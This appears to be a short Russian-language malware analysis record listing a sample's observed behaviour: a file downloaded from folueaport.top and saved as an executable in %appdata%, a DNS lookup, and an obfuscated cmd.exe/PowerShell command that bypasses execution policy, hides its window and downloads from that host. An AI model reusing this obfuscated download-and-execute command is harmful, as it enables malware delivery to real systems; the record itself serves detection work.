Техническая информация
- http://folueaport.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "p^ow^E^R^ShE^lL^.e^xE^ ^-EX^E^Cu^TionPOLicY BypASs ^-NopR^oFILE -^w^INDoWST^yl^E hI^DDEN^ (nE^W^-^Ob^jEc^t s^Y^S^t^EM.nET.WebC^L^iE^nt^).d^Ow^nlOad^f^Ile('http://folueaport....
- DNS ASK fo###aport.top
- '<SYSTEM32>\cmd.exe' /c "p^ow^E^R^ShE^lL^.e^xE^ ^-EX^E^Cu^TionPOLicY BypASs ^-NopR^oFILE -^w^INDoWST^yl^E hI^DDEN^ (nE^W^-^Ob^jEc^t s^Y^S^t^EM.nET.WebC^L^iE^nt^).d^Ow^nlOad^f^Ile('http://folueaport....' (со скрытым окном)